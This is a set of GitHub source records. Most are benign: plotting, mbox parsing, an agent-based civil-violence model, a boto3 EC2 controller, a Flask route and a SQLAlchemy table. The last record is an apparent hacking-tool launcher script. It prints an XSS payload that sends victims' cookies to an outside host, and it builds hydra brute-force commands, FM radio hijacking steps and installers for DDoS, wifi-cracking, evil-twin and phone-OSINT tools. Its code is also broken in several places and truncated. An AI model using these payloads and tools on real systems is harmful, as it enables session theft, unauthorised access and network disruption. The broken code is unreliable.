+{"seq_id":"19918982253","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nplt.style.use('paper')\nimport numpy\n\ndef plot():\n training_seen, train_losses = numpy.genfromtxt('training_results.txt', skip_header = 1, usecols = (0,1)).T\n test_seen, test_losses, acc = numpy.genfromtxt('test_result.txt', skip_header = 1, usecols = (0,1,2)).T\n fig, ax = plt.subplots()\n ax2 = ax.twinx()\n lns1 = ax.plot(training_seen, train_losses, label = 'train losses')\n lns2 = ax.plot(test_seen, test_losses, 'o', label = 'test losses')\n lns3 = ax2.plot(test_seen, acc, 'o-', color = 'C2', label = 'accuracy')\n lns = lns1 + lns2 + lns3\n labs = [l.get_label() for l in lns]\n ax.set_xlabel('Number of samples seen')\n ax.set_ylabel('Loss')\n ax2.set_ylabel('accuracy (%)')\n ax.legend(lns, labs, loc = 'center right')\n fig.savefig('training_result.png', dpi = 600)\n\n\nif __name__ == \"__main__\":\n plot()\n","repo_name":"SamarthSingh2001/LicencePI","sub_path":"plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30073253429","text":"name = input(\"Enter file:\")\nif len(name) < 1 : name = \"mbox-short.txt\"\nhandle = open(name)\ncounts = dict()\nfor line in handle :\n if line.startswith(\"From:\") :\n continue\n elif line.startswith(\"From\") :\n words = line.split()\n words = words[5]\n words = words[0:2]\n counts[words] = counts.get(words,0) + 1\n\nfor k,v in sorted(counts.items()) :\n print(k,v)\n","repo_name":"rahamanankit/my-python-codes","sub_path":"tuples1.py","file_name":"tuples1.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71377962293","text":"\nimport matplotlib.pyplot as plt\nimport importlib\nimport numpy as np\nimport pandas as pd\nfrom scipy.signal import find_peaks\nimport sys\nimport seaborn as sns\n\nfrom epstein_civil_violence.agent import Citizen, Cop\nfrom epstein_civil_violence.model import EpsteinCivilViolence\n\nimport time\n\nlegitimacy = \"Global\" # choose between \"Fixed\",\"Global\",\"Local\"\nnetwork = \"Barabasi\" # Choose between \"Barabasi\", \"Renyi\" and Small-world\nmax_iters = 200 # Choose for how many iterations you want the model to run\n\n\nstart = time.time()\nmodel = EpsteinCivilViolence(height=40, \n width=40, \n citizen_density=.7, \n cop_density=0.04, \n citizen_vision=7, \n cop_vision=7, \n legitimacy=.82, \n max_jail_term=30, \n max_iters=max_iters, \n smart_cops = False,\n legitimacy_kind = legitimacy, \n max_fighting_time=1,\n network = network,\n ) \nmodel.run_model()\n\n# Showing the time it takes to run the model\nfinish = time.time()\nprint(\"Time =\",finish-start)\n\n# Getting the data from the data collector\nmodel_out = model.datacollector.get_model_vars_dataframe()\nagent_out = model.datacollector.get_agent_vars_dataframe()\n\n# Shows the amount of active citizens and statistics\nprint(\"Mean amount of active citizens per step = \",model_out[\"Active\"].mean())\nprint(\"Std of amount of active citizens per step = \",model_out[\"Active\"].std())\nprint(\"Maximum of amount of active citizens in a time step = \",model_out[\"Active\"].max())\n\n# line 59 - 78 give back measured properties of the model\npeaks, _ = find_peaks(model_out[\"Active\"], height=50)\nprint(\"Indices of peaks:\", peaks, \"Amount:\", len(peaks))\n\nactives_list = model_out[\"Active\"].to_list()\nfor peak in peaks:\n print(\"Peak of \", actives_list[peak], \"citizens\")\n\npeak_intervals = []\nif len(peaks)>1:\n for i in range(len(peaks)-1):\n peak_intervals.append(peaks[i+1] - peaks[i])\nprint(\"Peak intervals = \",peak_intervals)\n\ntime_between = []\ntime = 0\ntotal_active = 0\n\ncount1, count2 = False, False\nfor i in range(1,len(actives_list)-1):\n if actives_list[i] < 50 and actives_list[i+1] >= 50:\n count1 = False\n time_between.append(time-1)\n time = 0\n if actives_list[i] >= 50 and actives_list[i+1] < 50:\n count1 = True\n if count1 == True:\n time += 1\n\nprint(\"Times of inter-outerbursts\", time_between)\n\n# Makes a plot of the state of the citizens\nax = model_out[[\"Quiescent\",\"Active\", \"Jailed\", \"Fighting\"]].plot()\nax.set_title('Citizen Condition Over Time')\nax.set_xlabel('Step')\nax.set_ylabel('Number of Citizens')\n_ = ax.legend(bbox_to_anchor=(1.35, 1.025))\nplt.tight_layout()\n\nplt.show()\n\n# Makes a plot of perceived legitimacy\nif legitimacy != \"Local\":\n ax = model_out[[\"Legitimacy\"]].plot()\n ax.set_title('Citizen Condition Over Time')\n ax.set_xlabel('Step')\n ax.set_ylabel('Number of Citizens')\n _ = ax.legend(bbox_to_anchor=(1.35, 1.025))\n plt.tight_layout()\n plt.show()\n\n\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1040', axis = 0 ).head())\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1041', axis = 0 ).head())\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1042', axis = 0 ).head())\n\nif legitimacy == \"Local\":\n ax = agent_out[\"Legitimacy\"].filter(like='1040', axis = 0 ).plot()\n ax.set_title('Citizen Condition Over Time')\n ax.set_xlabel('Step')\n ax.set_ylabel('Number of Citizens')\n _ = ax.legend(bbox_to_anchor=(1.35, 1.025))\n \n plt.tight_layout()\n 
plt.show()","repo_name":"DCCdelang/ABM","sub_path":"epstein_civil_violence_Normal+Network Grid/model_run.py","file_name":"model_run.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"32015866694","text":"import botocore\r\nimport botocore.exceptions\r\nfrom Logger import Logger\r\nfrom Config import AWS_REGION\r\n\r\n\r\nclass EC2Controller:\r\n # A class for controlling interactions with the boto3 EC2 Resource and Client Interface\r\n\r\n INSTANCES_DISPLAY_FORMAT = ' {0}({1}) \\t {2} - {3} \\t '\r\n DEVICE_DISPLAY_FORMAT = \"\\t\\t'{}'\\t '{}'\"\r\n MSG_INFO_AMI_CREATED = \"AMI created: {}['{}']\"\r\n MSG_INFO_INSTANCE_CREATED = \"Instance created.{}\"\r\n MSG_INFO_INSTANCE_STARTING = \"Starting instance:'{}'.Please wait..\"\r\n MSG_INFO_INSTANCE_STARTED = \"Instance started:'{}'\"\r\n MSG_INFO_INSTANCE_STOPPING = \"Stopping instance:'{}'.Please wait..\"\r\n MSG_INFO_INSTANCE_STOPPED = \"Instance stopped:'{}'\"\r\n MSG_INFO_RUNNING_INSTANCE = \"Running EC2 Instances: {}\"\r\n MSG_INFO_STOPPED_INSTANCE = \"Stopped EC2 Instances: {}\"\r\n MSG_INFO_STOPPED_RUNNING_INSTANCE = \"Available EC2 Instances: {}\"\r\n MSG_WARN_NO_INSTANCE = \"There is no EC2 Instance at this moment..\"\r\n MSG_WARN_NO_RUNNING_INSTANCE = \"There is no running EC2 Instance at this moment..\"\r\n MSG_WARN_NO_STOPPED_INSTANCE = \"There is no stopped EC2 Instance at this moment..\"\r\n MSG_WARN_NO_INSTANCE_FOR_EMI = \"There is no EC2 Instance for AMI creation at this moment..\"\r\n MSG_INFO_VOL_FROM_SNAP_CREATED = \"Volume created: {0}({1}) \\t {2}-{3} \\t \"\r\n STR_AWS_INSTANCE = \"\"\r\n STR_ATTACHED_DEVICE = \"\\t\\t\"\r\n\r\n def __init__(self, ec2res, ec2client):\r\n # EC2Controller Constructor, assigns the ec2 Resource \"ec2res\" and \"ec2client\" Client to this controller\r\n self.ec2_res = ec2res\r\n self.ec2_client = ec2client\r\n\r\n def start_instance(self, instance_id):\r\n # Start instance with id 'instance_id'\r\n try:\r\n instance = self.ec2_res.Instance(instance_id)\r\n instance.start()\r\n Logger.info(self.MSG_INFO_INSTANCE_STARTING.format(instance_id))\r\n # Wait for instance start operation to complete\r\n instance.wait_until_running()\r\n Logger.info(self.MSG_INFO_INSTANCE_STARTED.format(instance_id))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def stop_instance(self, instance_id):\r\n # Stop instance with id 'instance_id'\r\n try:\r\n instance = self.ec2_res.Instance(instance_id)\r\n instance.stop()\r\n Logger.info(self.MSG_INFO_INSTANCE_STOPPING.format(instance_id))\r\n # Wait for instance stop operation to complete\r\n instance.wait_until_stopped()\r\n Logger.info(self.MSG_INFO_INSTANCE_STOPPED.format(instance_id))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def list_instances(self):\r\n # List all EC2 instances\r\n return self.list_all_instances(self.ec2_res.instances.all())\r\n\r\n def list_all_instances(self, instances):\r\n count = 0\r\n running_instances = []\r\n pending_instances = []\r\n shutting_down_instances = []\r\n terminated_instances = []\r\n stopping_instances = []\r\n stopped_instances = []\r\n # Loop through all EC2 instances\r\n for instance in instances:\r\n instance_info = [instance.id, instance.state['Name'], instance.image_id, instance.instance_type,\r\n AWS_REGION, instance.launch_time]\r\n if instance.state['Name'] == \"running\":\r\n running_instances.append(instance_info)\r\n elif instance.state['Name'] == \"pending\":\r\n pending_instances.append(instance_info)\r\n elif instance.state['Name'] == \"shutting-down\":\r\n shutting_down_instances.append(instance_info)\r\n elif instance.state['Name'] == \"terminated\":\r\n 
terminated_instances.append(instance_info)\r\n elif instance.state['Name'] == \"stopping\":\r\n stopping_instances.append(instance_info)\r\n elif instance.state['Name'] == \"stopped\":\r\n stopped_instances.append(instance_info)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_INSTANCE)\r\n else:\r\n Logger.header(self.STR_AWS_INSTANCE)\r\n for running_instance in running_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*running_instance))\r\n for pending_instance in pending_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*pending_instance))\r\n for stopping_instance in stopping_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*stopping_instance))\r\n for stopped_instance in stopped_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*stopped_instance))\r\n for shutting_down_instance in shutting_down_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*shutting_down_instance))\r\n for terminated_instance in terminated_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*terminated_instance))\r\n return count\r\n\r\n def list_running_instance(self):\r\n # List all running EC2 instances\r\n count = 0\r\n running_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if instance.state['Name'] == \"running\":\r\n running_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_RUNNING_INSTANCE)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_RUNNING_INSTANCE.format(running_instances))\r\n return running_instances\r\n\r\n def list_stopped_instance(self):\r\n # List all stopped EC1 instances\r\n count = 0\r\n stopped_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if instance.state['Name'] == \"stopped\":\r\n stopped_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_STOPPED_INSTANCE)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_STOPPED_INSTANCE.format(stopped_instances))\r\n return stopped_instances\r\n\r\n def list_stopped_running_instances(self):\r\n # List all stopped and running EC2 instances\r\n count = 0\r\n available_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if instance.state['Name'] == \"running\" or instance.state['Name'] == \"stopped\":\r\n available_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_INSTANCE_FOR_EMI)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_STOPPED_RUNNING_INSTANCE.format(available_instances))\r\n return available_instances\r\n\r\n def instance_attached_block_devices(self, instance_id):\r\n # Any block device mapping entries for the instance\r\n count = 0\r\n instance = self.ec2_res.Instance(instance_id)\r\n attached_block_devices = []\r\n attached_devices_details = []\r\n bdm = instance.block_device_mappings\r\n for device in bdm:\r\n attached_block_devices.append(device['DeviceName'])\r\n ebs = device['Ebs']\r\n device_info = [device['DeviceName'], ebs['VolumeId']]\r\n attached_devices_details.append(device_info)\r\n count += 1\r\n if count > 0:\r\n 
Logger.header(self.STR_ATTACHED_DEVICE.format(instance_id))\r\n for devices_detail in attached_devices_details:\r\n Logger.sub_info(self.DEVICE_DISPLAY_FORMAT.format(*devices_detail))\r\n return attached_block_devices\r\n\r\n def instance_platform_name(self, instance_id):\r\n # instance platform name\r\n platform = self.ec2_res.Instance(instance_id).platform\r\n return platform\r\n\r\n def instance_state(self, instance_id):\r\n # instance state name\r\n state = self.ec2_res.Instance(instance_id).state['Name']\r\n return state\r\n\r\n def instance_root_device_name(self, instance_id):\r\n # instance root device name\r\n root_device_name = self.ec2_res.Instance(instance_id).root_device_name\r\n return root_device_name\r\n\r\n def create_instance(self, image_id, instance_type):\r\n # create a new EC2 instance with the given AMI Image ID\r\n try:\r\n instance = self.ec2_res.create_instances(ImageId=image_id, MinCount=1, MaxCount=1,\r\n InstanceType=instance_type)\r\n Logger.info(self.MSG_INFO_INSTANCE_CREATED.format(instance))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def create_image(self, instance_id, image_name):\r\n # create a new AMI from the given instance ID\r\n try:\r\n image_id = self.ec2_client.create_image(InstanceId=instance_id, Name=image_name)\r\n Logger.info(self.MSG_INFO_AMI_CREATED.format(image_name, image_id['ImageId']))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def create_volume(self, availability_zone, snapshot_id):\r\n # Create a volume from a snapshot\r\n try:\r\n volume = self.ec2_client.create_volume(AvailabilityZone=availability_zone, SnapshotId=snapshot_id)\r\n Logger.info(\r\n self.MSG_INFO_VOL_FROM_SNAP_CREATED.format(volume['VolumeId'], volume['State'], volume['VolumeType'],\r\n str(volume['Size']) + \"GB\",\r\n volume['AvailabilityZone'],\r\n volume['CreateTime']))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n","repo_name":"GitPointer/AWS_BOTO3_CLI","sub_path":"AWS_Boto3/EC2.py","file_name":"EC2.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"}
+{"seq_id":"16250174814","text":"# flake8: noqa\nfrom flask import Blueprint, jsonify\n\nfrom currencyexchange.database.fxrates import FxRate\n\nfxrates = Blueprint('fxrates', __name__)\n\n@fxrates.route('/refresh_fx_rates')\ndef refresh_fx_rates():\n count = FxRate.refresh_from_api()\n if count:\n response = dict(status=\"SUCCESS\", count=count)\n else:\n response = dict(status=\"FAILED\", count=None)\n return jsonify(response)\n","repo_name":"jerryshikanga/currency-exchange","sub_path":"currencyexchange/views/fxrates.py","file_name":"fxrates.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"19525424570","text":"from sqlalchemy import create_engine, Column, Integer, String, Float\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\n\r\nengine = create_engine(\"postgresql+psycopg2://postgres:admin@localhost/postgres\", echo=False)\r\n\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\nBase = declarative_base()\r\n\r\nclass SQL_Paint(Base):\r\n __tablename__ = \"paint\"\r\n\r\n id = Column(Integer, primary_key=True)\r\n name = Column(String[50])\r\n color = Column(String[50])\r\n type = Column(String[50])\r\n sizes = Column(String[50])\r\n prices = Column(String[50])\r\n area = Column(Float)\r\n\r\nBase.metadata.create_all(engine)\r\n\r\ndef addItemToTable():\r\n paint1 = SQL_Paint(name=\"Dulux\", color=\"White\", type=\"Matt\", sizes=\"2.5/5/10\", prices=\"14/18/22\", area=\"13\")\r\n\r\n session.add(paint1)\r\n\r\n session.commit()\r\n\r\n\r\ndef addItemsManually():\r\n name = input(\"name \")\r\n color = input(\"color \")\r\n type = input(\"paint type \")\r\n sizes = input(\"paint sizes \")\r\n prices = input(\"paint prices \")\r\n area = input(\"area \")\r\n\r\n paint1 = SQL_Paint(name=name, color=color, type=type, sizes=sizes, prices=prices, area=area)\r\n\r\n session.add(paint1)\r\n\r\n session.commit()\r\n\r\ndef readDataOffTable():\r\n paints = session.query(SQL_Paint)\r\n for paint in paints:\r\n print(paint.name)\r\n","repo_name":"thes32/flask_Paint_Can","sub_path":"databaseManager.py","file_name":"databaseManager.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"31275613576","text":"from pip import main\r\nfrom pip._internal import main\r\nfrom scapy import *\r\nimport scapy.all as scapy\r\nfrom scapy.layers import http\r\nimport socket\r\nimport threading\r\nimport subprocess\r\nimport os \r\nimport socket\r\nimport random \r\nimport time\r\nfrom subprocess import Popen\r\nfrom subprocess import call\r\nimport requests, os, sys, tempfile, subprocess, base64, time\r\nimport os\r\nimport signal\r\nimport csv\r\nimport speedtest\r\nimport datetime\r\nimport re\r\nimport sys\r\nimport webbrowser\r\n#https://www.youtube.com/watch?v=5-IRImDXjjc EN EL MINUTO 2:21:59 (spoofer snifeer\r\nlog = \"\"\r\ndef GPS():\r\n print(\"datos que debas conocer:frecuencia de onda\")\r\n frecuencia = input(\"ingrese la frecuencia(HZ)>\") \r\n distancia = float((frecuencia)*299708000)\r\n print(\"distancia:\"+distancia+\"metros\")\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#\r\ndef FMhack():\r\n print(\"1 -->> Install\")\r\n print(\"2 -->> Execute\")\r\n tipu = input(\"1 or 2?:\")\r\n if tipu == \"1\":\r\n os.system(\"git clone https://github.com/ChristopheJacquet/PiFmRds.git\")\r\n os.system(\"mv PiFmRds/src/ *\")\r\n os.system(\"make clean\")\r\n os.system(\"make\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 rds.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 waveforms.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 pi_fm_rds.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 fm_mpx.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 control_pipe.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 mailbox.c\")\r\n os.system(\"gcc -o pi_fm_rds rds.o waveforms.o mailbox.o pi_fm_rds.o gm_mpx.o control_pipe.o -lm -lsndfile\")\r\n os.system(\"clear\")\r\n print(\"monta el arduino en la imagen /hack-radio-frequencies-hijacking-fm-radio-with-raspberry-pi-wire.w1456.jpg/\")\r\n print(\" mas info en https://null-byte.wonderhowto.com/how-to/hack-radio-frequencies-hijacking-fm-radio-with-raspberry-pi-wire-0177007/\")\r\n if tipu == \"2\":\r\n freq = input(\"Frecuency-->>\")\r\n os.system(\"sudo ./pi_fm_rds -freq \"+freq+\" -audio audio.wav\")\r\ndef vulnerability():\r\n print(\"1 -->> Install\")\r\n print(\"2 -->> Execute\")\r\n x = input(\"1 or 2?:\")\r\n if x == \"1\":\r\n os.system(\"git clone https://github.com/infosecsecurity/Spaghetti\")\r\n os.system(\"mv Spaghetti/ *\")\r\n os.system(\"sudo pip install -r doc/requirements.txt\")\r\n if x == \"2\":\r\n os.system(\"python3 spaghetti.py -h\")\r\ndef XSSattack():\r\n console = \"\"\"\r\n\r\n console.log(document.cookie)\r\n console.log(localStorage)\r\n\r\n \"\"\"\r\n exploit = \"\"\"\r\n var xmlHttp = new XMLHttpRequest();\r\n xmlHttp.open(\"GET\", 'https://XXXXXXXXX.com/register.php?cookie='+document.cookie);\r\n xmlHttp.send(null);\r\n \"\"\"\r\n PHP = \"\"\"\r\n \r\n var test = ‘.. / example.php? 
cookie_data =’ + escape (document.cookie);\r\n \r\n\r\n \"\"\"\r\n print(\"exploit console:\" +exploit+\"\")\r\n print(\"\")#2\r\n print(\"PHP register:\"+PHP+\"\")\r\n print(\"\")#1\r\n print(\"Console:\"+console+\"\")\r\n print(\"\")#3#\r\n print(\"script in the web:\"+scriptweb+\"\")\r\n tipa = input(\"Do you want to install (Y , N or payloads):\")\r\n if tipa == \"Y\":\r\n os.system(\"git clone https://github.com/securityproject/web-app-pentesting\")\r\n os.system(\"mv web-app-pentesting/ *\")\r\n if tipa == \"N\":\r\n os.system(\"sudo python3 brutefxss.py\")\r\n if tipa == \"payloads\":\r\n tipar = input(\"do you want to install?(Y or N):\")\r\n if tipar == \"Y\": \r\n os.system(\"https://github.com/farinap5/webpwn\")\r\n os.system(\"mv webpwn/ *\")\r\n if tipar == \"N\":\r\n print(\" Example:https://iesjuanramonjimenez.org/?s=Frances\")\r\n web = input(\"Print the website:\")\r\n os.system(\"sudo python3 webpwn.py \"+web+ \"\")\r\ndef VPN():\r\n __author__ = \"nil\"\r\n __copyright__ = \"nil\"\r\n __license__ = \"nil\"\r\n __version__ = \"nil\"\r\n __maintainer__ = \"nil\"\r\n __email__ = \"nil\"\r\n\r\n\r\n if len(sys.argv) != 2:\r\n print('usage: ' + sys.argv[0] + ' [country name | country code]')\r\n exit(1)\r\n country = sys.argv[1]\r\n\r\n if len(country) == 2:\r\n i = 6 # short name for country\r\n elif len(country) > 2:\r\n i = 5 # long name for country\r\n else:\r\n print('Country is too short!')\r\n exit(1)\r\n \r\n try:\r\n vpn_data = requests.get('http://www.vpngate.net/api/iphone/').text.replace('\\r','')\r\n servers = [line.split(',') for line in vpn_data.split('\\n')]\r\n labels = servers[1]\r\n labels[0] = labels[0][1:]\r\n servers = [s for s in servers[2:] if len(s) > 1]\r\n except:\r\n print('Cannot get VPN servers data')\r\n exit(1)\r\n \r\n desired = [s for s in servers if country.lower() in s[i].lower()]\r\n found = len(desired)\r\n print('Found ' + str(found) + ' servers for country ' + country)\r\n if found == 0:\r\n exit(1)\r\n \r\n supported = [s for s in desired if len(s[-1]) > 0]\r\n print(str(len(supported)) + ' of these servers support OpenVPN')\r\n # We pick the best servers by score\r\n winner = sorted(supported, key=lambda s: float(s[2].replace(',','.')), reverse=True)[0]\r\n print (\"\\n== Best server ==\")\r\n pairs = zip(labels, winner)[:-1]\r\n for (l, d) in pairs[:4]:\r\n print(l + ': ' + d)\r\n\r\n print(pairs[4][0] + ': ' + str(float(pairs[4][1]) / 10**6) + ' MBps')\r\n print(\"Country: \" + pairs[5][1])\r\n \r\n print (\"\\nLaunching VPN...\")\r\n _, path = tempfile.mkstemp()\r\n\r\n f = open(path, 'w')\r\n f.write(base64.b64decode(winner[-1]))\r\n f.write('\\nscript-security 2\\nup /etc/openvpn/update-resolv-conf\\ndown /etc/openvpn/update-resolv-conf')\r\n f.close()\r\n\r\n x = subprocess.Popen(['sudo', 'openvpn', '--config', path])\r\n\r\n try:\r\n while True:\r\n time.sleep(600)\r\n # termination with Ctrl+C\r\n except:\r\n try:\r\n x.kill()\r\n except:\r\n pass\r\n while x.poll() != 0:\r\n time.sleep(1)\r\n print ('\\nVPN terminated')\r\n\r\ndef bruteforce():\r\n print(\"sudo hydra -l [user] -P [location wordlist] [IP] [method]\")\r\n print(\"methods:telnet,http,https,ssh,FTP,SMTP[25],IMAP\")\r\n print(\"wordlist:9e89fe_eada3f79027240d38184dd68f8efa476.txt\")\r\n print(\"type without sudo hydra\")\r\n print(\"Example: -l user -P wordlist:9e89fe_eada3f79027240d38184dd68f8efa476.txt 255.255.255.0 http\")\r\n command = input (\">>>\")\r\n os.system(\"sudo hydra \"+command+ \"\")\r\n\r\ndef localflood():\r\n print(\"asegurese de que la carpeta 
contenga los archivos html para el texto\")\r\n print(\"seguido de esto utilice el comando [CD] para entrar en la carpeta\")\r\n print(\"por ultimo inserte el comando [python -m http.server --bind localhost --cgi [puerto normalmente 8080 o 8081]\")\r\n\r\n\r\ndef fastMeterpreter():\r\n print(\"1--> Download\")\r\n print(\"2--> Execute\")\r\n down = input(\"1 or 2:\")\r\n if down == \"1\":\r\n os.system(\"sudo apt install metasploit-framwerk gnome-terminal python3 python3-pip nc\")\r\n os.system(\"mv fastMeterpreter2/ * \")\r\n os.system(\"pip install -r requirements.txt\")\r\n if down == \"2\":\r\n os.system(\"sudo python3 fastMeterpreter2.py\")\r\n\r\ndef wifispeed():\r\n print(\"1--> Monitoreo grafico\")\r\n print(\"2--> Monitoreo en consola\")\r\n monitoreo = input(\"1 or 2:\")\r\n if monitoreo == \"1\":\r\n times = []\r\n download = []\r\n upload = []\r\n with open('test.csv', 'r') as csvfile:\r\n plots = csv.reader(csvfile, delimiter=',')\r\n next(csvfile)\r\n for row in plots:\r\n times.append(str(row[0]))\r\n download.append(float(row[1]))\r\n upload.append(float(row[2]))\r\n print(times, \"\\n\", download, \"\\n\", upload)\r\n plt.figure('speedtest', [30, 30])\r\n plt.plot(times, download, label='download', color='r')\r\n plt.plot(times, upload, label='upload', color='b')\r\n plt.xlabel('time')\r\n plt.ylabel('speed in Mb/s')\r\n plt.title(\"internet speed\")\r\n plt.legend()\r\n plt.savefig('test_graph.jpg', bbox_inches='tight')\r\n if monitoreo == \"2\":\r\n s = speedtest.Speedtest()\r\n while True:\r\n time = datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n downspeed = round((round(s.download()) / 1048576), 2)\r\n upspeed = round((round(s.upload()) / 1048576), 2)\r\n print(f\"time: {time}, downspeed: {downspeed} Mb/s, upspeed: {upspeed} Mb/s\")\r\n\r\ndef passwordspeed():\r\n Hashcat = input(\"Do you have Hashcat installed?(Y or N):\")\r\n if Hashcat == \"Y\":\r\n os.system(\"sudo apt-get install hashcat\")\r\n if hashcat == \"N\":\r\n os.system(\"sudo hashcat -b\")\r\ndef goodkiller():\r\n print(\"1 -->>> download \")\r\n print(\"2 -->> Execute\")\r\n you = input(\"1 or 2:\")\r\n if you == \"1\":\r\n os.system(\"https://github.com/FDX100/GOD-KILLER\")\r\n os.system(\"mv GOD-KILLER/ *\")\r\n os.system(\"sudo python3 install.py\")\r\n if you == \"2\":\r\n os.system(\"GOD-KILLER\")\r\ndef phoneinfoga():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n phoneinfoga = input(\"1 or 2:\")\r\n if phoneinfoga == \"1\":\r\n os.system(\"git clone https://github.com/sundowndev/PhoneInfoga\")\r\n os.system(\"mv PhoneInfoga/ *\")\r\n os.system(\"sudo python3 -m pip install -r requirements.txt --user\")\r\n os.system(\"sudo wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz\")\r\n os.system(\"sudo tar xvfz geckodriver-v0.24.0-linux64.tar.gz\")\r\n os.system(\"sudo chmod +x geckodriver\")\r\n os.system(\"sudo export PATH=$PATH:/ruta-extraida/\")\r\n os.system(\"docker pull sundowndev/phoneinfoga:latest\")\r\n os.system(\"docker run --rm -it sundowndev/phoneinfoga --help\")\r\n if phoneinfoga == \"2\":\r\n print(\"EJ:(+51) 927742190\")\r\n phone = input(\"tlfn phone with the (+)>>>\")\r\n os.system(\"python3 phoneinfoga.py -n \"+phone+\"\")\r\ndef BTCanalizer():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n BTC = input(\"1 or 2:\")\r\n if BTC == \"1\":\r\n os.system(\"git clone https://github.com/s4vitar/btcAnalyzer\")\r\n os.system(\"mv btcAnalyzer/ *\")\r\n os.system(\"sudo apt-get install 
html2text bc -y\")\r\n if BTC == \"2\":\r\n print(\"-n transacciones totales\")\r\n print(\"-i identificador de la transaccion\")\r\n print(\"-a especificar la adress\")\r\n print(\"EJ: -e adress -a XXXXXXXXXXXXXXXXXX\")\r\n what = input(\"command:\")\r\n os.system(\"sudo ./btcAnalyzer\" +what+ \"\")\r\n\r\ndef wifiCrack():\r\n print(\" 1 -->> Download\")\r\n print(\" 2 -->> Execute\")\r\n input = input(\"1,2>>>\")\r\n if Wifi == \"1\":\r\n os.system(\"git clone https://github.com/s4vitar/wifiCrack\")\r\n if Wifi == \"2\":\r\n os.system(\"sudo ./s4iPwnWifi.sh\")\r\n\r\ndef TPLINK():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n tplin = input(\"1 or 2:\")\r\n if tplin == \"1\": \r\n print(\"Wait a second...\")\r\n time.sleep(4)\r\n os.system(\"git clone https://github.com/vk496/linset\")\r\n os.system(\"mv Linset/* .\")\r\n os.system(\"chmod +x linset\")\r\n if tplin == \"2\":\r\n os.system(\"./linset\")\r\ndef Ddoswifi():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n wifi = input(\"1 or 2:\")\r\n if wifi == \"1\":\r\n os.system(\"git clone https://github.com/palahsu/DDoS-Ripper\")\r\n os.system(\"mv DDoS-Ripper/ 